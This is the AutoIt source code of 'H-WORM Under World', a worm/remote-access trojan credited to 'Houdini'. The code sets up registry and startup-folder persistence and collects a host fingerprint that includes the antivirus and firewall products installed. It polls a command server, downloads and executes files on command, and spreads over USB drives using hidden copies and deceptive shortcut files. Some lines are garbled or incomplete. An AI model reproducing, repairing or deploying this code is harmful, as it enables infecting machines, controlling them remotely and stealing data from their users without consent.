  1. # Cs = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  2. H-WORM UNDER WORLD (AUTOIT VERSION) \
  3. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  4.  
  5. CODER:
  6. HOUDINI (C) - WWW.DEV-POINT.COM
  7.  
  8. COMPILED LANGUAGE:
  9. AUTOIT V 3.0
  10.  
  11. VISIT OWR FOR MORE INFO OR CONTACT ME IN:
  12. SKYPE: HOUDINI-FX
  13.  
  14. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  15.  
  16. # INCLUDE <PROCESS.AU3>
  17. # INCLUDE <WINAPI.AU3>
  18. # INCLUDE <FILE.AU3>
  19. # NOTRAYICON
  20.  
  21. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  22. WORM CONFIG
  23. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  24.  
  25. LOCAL $ IP_ADDR = "127.0.0.1"
  26. LOCAL $ PORT = "40055"
  27. LOCAL $ INSTALL_DIR = @ TEMPDIR
  28.  
  29.  
  30. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  31. WORM VARIABLE
  32. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  33.  
  34. LOCAL $ CIMV2 = OBJGET ("WINMGMTS: {IMPERSONATIONLEVEL = IMPERSONATE}! \ \. \ ROOT \ CIMV2")
  35. LOCAL $ SPLITTER = "<|>"
  36. LOCAL $ WORM_VERSION = "H-WORM (AUTOIT)"
  37. LOCAL $ USB_SPREADING = "FALSE"
  38. LOCAL $ SERVER_CMD
  39. LOCAL $ W_METUX
  40. LOCAL $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT
  41.  
  42.  
  43. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  44. WORM CODE: START
  45. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  46.  
  47. IF NOT @ COMPILED THEN EXIT
  48. __INIT ()
  49. WHILE TRUE
  50. __USB_SPREADING ()
  51. __STARTUP ()
  52. $ SERVER_CMD = __ POST ("I_AM_READY")
  53. $ SERVER_CMD = STRINGSPLIT ($ SERVER_CMD, $ SPLITTER, 1)
  54. SELECT
  55. CASE $ SERVER_CMD [1] = "UNINSTALL"
  56. CONSOLEWRITE ($ SERVER_CMD [1] & @ CRLF)
  57. __USB_SPREADING ($ SERVER_CMD [1])
  58. REGDELETE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
  59. REGDELETE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
  60. FILEDELETE (@ STARTUPDIR & "\" & @ SCRIPTNAME)
  61. EXIT
  62. CASE $ SERVER_CMD [1] = "UPDATE"
  63. CONSOLEWRITE ("UPDATE" & $ SERVER_CMD [2] & @ CRLF)
  64. _WINAPI_CLOSEHANDLE ($ W_METUX)
  65. __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2], TRUE, "/ UPDATE")
  66. EXIT
  67. CASE $ SERVER_CMD [1] = "SEND"
  68. CONSOLEWRITE ("SEND" & $ SERVER_CMD [2] & @ CRLF)
  69. __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2])
  70. CASE $ SERVER_CMD [1] = "EXCECUTE"
  71. CONSOLEWRITE ("EXCECUTE" & $ SERVER_CMD [2] & @ CRLF)
  72. __RUNA3X ($ SERVER_CMD [2])
  73. ENDSELECT
  74. SLEEP (5000)
  75. WEND
  76.  
  77.  
  78. FUNC __ INIT ()
  79.  
  80. _PATHSPLIT (@ SCRIPTFULLPATH, $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT)
  81. IF STRINGUPPER (FILEGETLONGNAME (@ SCRIPTFULLPATH)) <> STRINGUPPER (FILEGETLONGNAME ($ INSTALL_DIR & "\" & @ SCRIPTNAME)) THEN
  82. IF ($ CMDLINE [0]> 0) AND ($ CMDLINE [1] = "/ UPDATE") THEN
  83. DO
  84. UNTIL FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8) = 1
  85. ELSE
  86. FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8)
  87. ENDIF
  88. SHELLEXECUTE ($ INSTALL_DIR & "\" & @ SCRIPTNAME)
  89. EXIT
  90. ENDIF
  91. __ONE_INSTANCE ()
  92. __IS_USB_SPREADING ()
  93. ENDFUNC
  94.  
  95.  
  96.  
  97. FUNC __ DAWONLOAD_AND_EXEC ($ FILE, $ RUN = TRUE, $ CMD = "")
  98.  
  99. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
  100. LOCAL $ FGET_HANDEL
  101.  
  102. _PATHSPLIT ($ FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  103. $ RESULT = __ POST ("IS-SENDING" & $ SPLITTER & $ FILE, "STREAM")
  104. $ FGET_HANDEL = FILEOPEN (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, 16 +2 +8)
  105. FILEWRITE ($ FGET_HANDEL, $ RESULT)
  106. FILECLOSE ($ FGET_HANDEL)
  107. IF $ RUN THEN SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, $ CMD)
  108. RETURN @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT
  109. ENDFUNC
  110.  
  111.  
  112.  
  113.  
  114. FUNC __ RUNA3X ($ A3X_FILE, $ CMD = "")
  115.  
  116. LOCAL $ H_RESOURCE, $ A3X_STRUCT, $ A3X_DATA
  117. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
  118. LOCAL $ FGET_HANDEL
  119.  
  120. _PATHSPLIT ($ A3X_FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  121. FILECOPY (@ AUTOITEXE, @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", 1 +8)
  122. $ A3X_DATA = __ POST ("IS-SENDING" & $ SPLITTER & $ A3X_FILE, "STREAM")
  123. $ A3X_STRUCT = DLLSTRUCTCREATE ("BYTE A3X [" & BINARYLEN ($ A3X_DATA) & "]")
  124. DLLSTRUCTSETDATA ($ A3X_STRUCT, "A3X", $ A3X_DATA)
  125.  
  126. $ H_RESOURCE = DLLCALL
  127. IF $ H_RESOURCE [0] <> 0 THEN
  128. DLLCALL ($ A3X_STRUCT), "DWORD", DLLSTRUCTGETSIZE ($ A3X_STRUCT))
  129. DLLCALL ("KERNEL32.DLL", "BOOL", "EndUpdateResource", "HANDLE", $ H_RESOURCE [0], "BOOL", FALSE)
  130. SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", $ CMD)
  131. ENDIF
  132. ENDFUNC
  133.  
  134.  
  135.  
  136.  
  137. FUNC __ POST ($ DATA, $ TYPE = "TEXT")
  138.  
  139. LOCAL $ RESULT
  140.  
  141. HTTPSETUSERAGENT (__INFORMATIOM ())
  142. $ RESULT = INETREAD ("HTTP :/ /" & $ IP_ADDR & ":" & $ PORT & "/" & $ DATA, 1)
  143. IF $ TYPE = "TEXT" THEN RETURN STRINGUPPER (BINARYTOSTRING ($ RESULT))
  144. RETURN $ RESULT
  145. ENDFUNC
  146.  
  147.  
  148. FUNC __ STARTUP ()
  149.  
  150. REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
  151. REGWRITE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
  152. FILECOPY (@ SCRIPTFULLPATH, @ STARTUPDIR & "\" & @ SCRIPTNAME)
  153. ENDFUNC
  154.  
  155.  
  156. FUNC __ INFORMATIOM ()
  157.  
  158. LOCAL $ INFORAMTION = ""
  159.  
  160. $ INFORAMTION = $ INFORAMTION & HEX (DRIVEGETSERIAL (@ HOMEDRIVE), 8) & $ SPLITTER
  161. $ INFORAMTION = $ INFORAMTION & @ COMPUTERNAME & $ SPLITTER
  162. $ INFORAMTION = $ INFORAMTION & @ USERNAME & $ SPLITTER
  163. $ INFORAMTION = $ INFORAMTION & __ OPERATING_SYSTEM () & $ SPLITTER
  164. $ INFORAMTION = $ INFORAMTION & $ WORM_VERSION & $ SPLITTER
  165. $ INFORAMTION = $ INFORAMTION & __ SECURITY_CENTER () & $ SPLITTER
  166. $ INFORAMTION = $ INFORAMTION & $ USB_SPREADING & $ SPLITTER
  167. $ INFORAMTION = $ INFORAMTION & __ TOP_WINDOWS ()
  168. RETURN $ INFORAMTION
  169.  
  170. ENDFUNC
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177. FUNC __ OPERATING_SYSTEM ()
  178.  
  179. LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
  180. LOCAL $ OS_CAPTION = ""
  181.  
  182. FOR $ OS IN $ OPERATINGSYSTEM
  183. $ OS_CAPTION = $ OS.CAPTION & "."
  184. EXITLOOP
  185. NEXT
  186. RETURN $ OS_CAPTION
  187. ENDFUNC
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194. FUNC __ SECURITY_CENTER ()
  195.  
  196.  
  197. LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
  198. LOCAL $ OS_VERSION
  199. LOCAL $ SECURITY_CENTER = "SECURITYCENTER"
  200.  
  201. FOR $ OS IN $ OPERATINGSYSTEM
  202. $ OS_VERSION = NUMBER ($ OS.VERSION)
  203. NEXT
  204. IF $ OS_VERSION> 6 THEN $ SECURITY_CENTER = "SECURITYCENTER2"
  205. $ OBJ_SECURITY_CENTER = OBJGET ("WINMGMTS: \ \. \ ROOT \" & $ SECURITY_CENTER)
  206.  
  207. LOCAL $ COL_ANTI_VIRUS = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM ANTIVIRUSPRODUCT")
  208. LOCAL $ ANTI_VIRUSE = ""
  209. LOCAL $ COL_FIRE_WALL = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM FIREWALLPRODUCT")
  210. LOCAL $ FIRE_WALL = ""
  211.  
  212. FOR $ OBJ_ANTI_VIRUS IN $ COL_ANTI_VIRUS
  213. $ ANTI_VIRUSE & = $ ANTI_VIRUSE & $ OBJ_ANTI_VIRUS.DISPLAYNAME & "."
  214. NEXT
  215.  
  216. FOR $ OBJ_FIRE_WALL IN $ COL_FIRE_WALL
  217. $ FIRE_WALL & = $ FIRE_WALL & $ OBJ_FIRE_WALL.DISPLAYNAME & "."
  218. NEXT
  219.  
  220. IF $ ANTI_VIRUSE = "" THEN $ ANTI_VIRUSE = "NO AV"
  221. IF $ FIRE_WALL = "" THEN $ FIRE_WALL = "NO FW"
  222.  
  223. RETURN $ ANTI_VIRUSE & "<|>" & $ FIRE_WALL
  224. ENDFUNC
  225.  
  226.  
  227.  
  228.  
  229.  
  230. FUNC __ TOP_WINDOWS ()
  231.  
  232. LOCAL $ WINTOP_TEXT = _WINAPI_GETWINDOWTEXT (_WINAPI_GETFOREGROUNDWINDOW ())
  233. LOCAL $ WINTOP_PID, $ WINTOP_PNAME
  234. _WINAPI_GETWINDOWTHREADPROCESSID (_WINAPI_GETFOREGROUNDWINDOW (), $ WINTOP_PID)
  235. $ WINTOP_PNAME = _PROCESSGETNAME ($ WINTOP_PID)
  236.  
  237. RETURN $ WINTOP_TEXT & "- [" & $ WINTOP_PNAME & "]"
  238. ENDFUNC
  239.  
  240.  
  241.  
  242.  
  243.  
  244. FUNC __ ONE_INSTANCE ()
  245.  
  246. $ W_METUX = _WINAPI_CREATEMUTEX ($ WZFNAME & "_" & $ WORM_VERSION)
  247. IF (@ ERROR) OR (_WINAPI_GETLASTERROR () = 183) THEN EXIT
  248. ENDFUNC
  249.  
  250.  
  251.  
  252. FUNC __ USB_SPREADING ($ TYPE = "INSTALL")
  253.  
  254. $ DISK = DRIVEGETDRIVE ("REMOVABLE")
  255. IF NOT ISARRAY ($ DISK) THEN RETURN
  256. FOR $ I = 1 TO $ DISK [0] STEP 1
  257. IF DRIVESTATUS ($ DISK [$ I]) = "READY" THEN __ IFOLDERS ($ DISK [$ I] & "\", $ TYPE)
  258. NEXT
  259.  
  260. ENDFUNC
  261.  
  262.  
  263.  
  264. FUNC __ IS_USB_SPREADING ()
  265.  
  266. LOCAL $ W_KEY = STRINGSPLIT (@ SCRIPTNAME, ".")
  267. $ USB_SPREADING = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "")
  268. IF $ USB_SPREADING = "" THEN
  269. $ USB_SPREADING = "FALSE"
  270. IF STRINGUPPER (STRINGMID (@ SCRIPTFULLPATH, 2)) = STRINGUPPER (": \" & @ SCRIPTNAME) THEN $ USB_SPREADING = "TRUE"
  271. REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "", "REG_SZ", $ USB_SPREADING)
  272. ENDIF
  273. ENDFUNC
  274.  
  275.  
  276.  
  277. FUNC __ IFOLDERS ($ ROOT, $ TYPE = "INSTALL", $ FIRST = TRUE, $ CALLBACK = "__CALLBACK")
  278.  
  279. LOCAL $ H_SEARCH, $ ENUM_ARRAY [1], $ FIND_NAME
  280. LOCAL $ G_COUNTER = 0, $ L_COUNTER = 0
  281.  
  282. $ ENUM_ARRAY [0] = $ ROOT
  283. DO
  284. $ H_SEARCH = FILEFINDFIRSTFILE ($ ENUM_ARRAY [$ G_COUNTER] & "\ *")
  285. DO
  286. $ FIND_NAME = FILEFINDNEXTFILE ($ H_SEARCH)
  287. IF NOT @ ERROR AND $ FIND_NAME <> "" THEN
  288. REDIM $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) +1]
  289. $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) -1] = $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME
  290. CALL ($ CALLBACK, $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME, $ TYPE)
  291. $ L_COUNTER + = 1
  292. ENDIF
  293. UNTIL @ ERROR OR $ FIND_NAME = ""
  294. FILECLOSE ($ H_SEARCH)
  295. IF $ FIRST = TRUE AND $ G_COUNTER = 0 THEN EXITLOOP
  296. $ G_COUNTER + = 1
  297. UNTIL $ G_COUNTER> $ L_COUNTER
  298. RETURN $ ENUM_ARRAY
  299. ENDFUNC
  300.  
  301.  
  302. FUNC __ CALLBACK ($ PATH, $ TYPE)
  303.  
  304. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT, $ SZICON, $ ARGU
  305. _PATHSPLIT ($ PATH, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  306.  
  307. IF $ TYPE = "INSTALL" THEN
  308. IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN RETURN
  309. FILECOPY (@ SCRIPTFULLPATH, $ SZDRIVE & $ SZDIR & @ SCRIPTNAME, TRUE)
  310. FILESETATTRIB ($ SZDRIVE & $ SZDIR & @ SCRIPTNAME, "+ HS")
  311. $ ARGU = "/ C START" & STRINGREPLACE (@ SCRIPTNAME, "", CHRW (34) & "" & CHRW (34)) & "& START" & STRINGREPLACE ($ SZFNAME & $ SZEXT, "", CHRW (34) & "" & CHRW (34)) & "& EXIT"
  312. IF NOT STRINGINSTR (FILEGETATTRIB ($ PATH), "D") THEN
  313. $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & $ SZEXT, "") & "\ DEFAULTICON", "")
  314. ELSE
  315. $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \ FOLDER \ DEFAULTICON", "")
  316. ENDIF
  317. $ SZICON = STRINGSPLIT ($ SZICON, ",")
  318. IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1") = 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ SZICON [1], "", "", @ SW_HIDE)
  319. IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1")> 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ PATH, "", "", @ SW_HIDE)
  320. IF ($ SZICON [0] = 2) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU, "", $ SZICON [1], "", $ SZICON [2] , @ SW_HIDE)
  321. FILESETATTRIB ($ PATH, "+ HS")
  322. ENDIF
  323. IF $ TYPE = "UNINSTALL" THEN
  324. IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN FILEDELETE ($ PATH)
  325. FILESETATTRIB ($ PATH, "-HS")
  326. ENDIF
  327.  
  328. ENDFUNC
  329.  
  330.  
  331. FUNC _WINAPI_CREATEMUTEX ($ SMUTEX, $ FINITIAL = 1, $ TSECURITY = 0)
  332.  
  333. LOCAL $ RET = DLLCALL ('KERNEL32.DLL', 'PTR', 'CreateMutexW', 'PTR', DLLSTRUCTGETPTR ($ TSECURITY), 'INT', $ FINITIAL, 'WSTR', $ SMUTEX)
  334. IF (@ ERROR) OR (NOT $ RET [0]) THEN
  335. RETURN SETERROR (1, 0, 0)
  336. ENDIF
  337. RETURN $ RET [0]
  338. ENDFUNC